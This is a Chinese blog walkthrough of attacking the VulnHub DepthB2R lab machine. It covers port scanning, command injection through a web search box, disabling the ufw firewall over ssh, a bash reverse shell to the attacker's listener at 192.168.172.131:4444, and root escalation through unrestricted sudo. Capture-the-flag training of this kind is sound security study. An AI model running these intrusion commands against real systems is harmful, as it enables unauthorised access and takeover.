【vulnhub】DepthB2R 打靶渗透

最新推荐文章于 2024-08-12 00:41:54 发布
最新推荐文章于 2024-08-12 00:41:54 发布
阅读量189 收藏 1
点赞数 5
文章标签: 网络 web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62162207/article/details/141002715
版权

一、信息收集

1.查看MAC地址

2.主机扫描

3.端口扫描

nmap -A -v -T4 192.168.172.176 -p 1-65535

发现只有8080端口开放

4.目录扫描

扫出来挺多一会儿尝试利用

二、内网渗透

访问8080端口

点击manager webapp会出现一个弹框

尝试弱口令,登陆失败

查看扫出的目录,查看有没有密码账号信息,发现一个搜索框

测试发现可以进行命令执行,查看home目录下的文件

ls -la /home

弹出账号信息

可以执行命令,但是尝试反弹shell失败

看一下进程,发现有ssh,之前没有扫到,可能是因为防火墙

ps aux

ls -la /etc

查看一下/etc发现防火墙是存在的

利用命令关闭

ssh bill@localhost sudo ufw disable

二、GetShell

再次反弹shell,kali监听

nc -lvvp 4444

执行语句

ssh bill@localhost bash -i >& /dev/tcp/192.168.172.131/4444 0>&1

监听成功

三、提权

sudo -l

发现显示all,可以在任何主机上以任何用户身份执行任何命令

sudo su
python3 -c 'import pty;pty.spawn("/bin/bash")'

提权成功

下届免单用户
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AXA2R allegro封装
05-06
AXA2R Allegro封装是Panasonic公司推出的一款专门针对SD卡贴片接插件的电子设计自动化(EDA)软件工具。在电子硬件设计中,封装是至关重要的一个环节,它涉及芯片与电路板之间的物理连接,以及信号传输的可靠性。AXA...
vx-2r中文说明书
08-22
根据给定的文件信息,八重洲vx-2r中文说明书的内容是关于八重洲(YAESU)品牌出品的vx-2r型号的无线电对讲机的全部操作指南,包括了对菜单选项的详细说明。由于文件内容部分只提供了原始扫描文字,并且由于技术原因...
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 372
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
vulnhub系列:DepthB2R
jq_j37的博客
08-03 282
vulnhub系列:DepthB2R靶机,打靶文章
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 224
【代码】DepthB2R靶机渗透测试。
DepthB2R靶机
zdd1453691081的博客
08-04 296
【代码】DepthB2R靶机。
DepthB2R靶场实战【超详细】
weixin_68615160的博客
08-05 333
输入ls -la /home,发现root 和bill用户。发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙。sudo -l查看具有sudo权限的命令程序。有一个test.jsp,我们访问它。kali开启监听,成功反弹shell。显示所有用户,直接sudo su。查看/etc下,防火墙是存在的。反弹未能成功,我们看一下进程。访问其8080web服务。发现开启了8080端口。提示我们可以输入命令。我们尝试反弹shell。我们对该端口进行扫描。
DepthB2R【附代码】(权限提升)
weixin_52487093的博客
08-05 270
BREACH: 2.1【附代码】(权限提升)
Vulnhub靶机 Depth渗透测试)
2301_78721909的博客
07-29 328
Vulnhub靶机 Depth(from wuhu)
vulnhub depth漏洞复现超详细 呦呦呦
2301_76467680的博客
07-26 173
ps aux发现ssh猜测有防火墙。然后输入ls -l/tmp。反弹shell同时开启监听。查看/etc果然有防火墙。
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 928
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
Example_Src.zip_Example_Src_towerk2r
09-21
【标题】"Example_Src.zip_Example_Src_towerk2r" 提供的信息表明,这是一个与编程或软件开发相关的压缩文件,其中包含了名为 "Example_Src" 的源代码库或者项目。"towerk2r" 可能是该项目的一个特定版本或者是...
dos7_redo2r_dos7.0_full_
10-03
【标题】"dos7_redo2r_dos7.0_full_" 指的是一个针对IBM PC-DOS 7.0的完整版本的重制或还原项目,名为"redo2r"。这个版本可能是一个非官方的更新或者复刻,旨在提供与原版DOS 7.0相同的功能和体验,但可能包含了修复...
2R机器臂动力学仿真Sinulink
08-07
本工程使用matlab2018b建立,需使用此版本或更高才可打开。二连杆机械臂动力学仿真,使用Simscape Multibody多体工具箱建立连杆模型,控制方法:PD反馈控制,实现无余差跟踪,压缩包含有PD控制原理介绍。
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 394
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全
深度解密CRLF注入与重定向漏洞:从原理到实践
2301_80064376的博客
08-08 915
重定向漏洞(Open Redirect)是一种安全漏洞,攻击者可以利用它将用户从受信任的网站重定向到恶意网站。这种漏洞通常出现在网站处理 URL 参数时,没有对用户输入进行适当验证。
HAProxy基本配置及参数实操
最新发布
Webston的博客
08-12 886
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
OSPF小实验
sgdhshshhs的博客
08-07 423
【代码】OSPF小实验。
八重洲VX-2R双段对讲机操作与功能详解
"八重洲VX-2R是一款VHF/UHF双频段超紧凑型收发器,具备宽频覆盖功能的操作手册。这款对讲机由Vertex Standard公司制造,适用于全球多个地区,包括美国、欧洲和英国等地。手册包含详细的操作指南,如记忆模式、常规...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值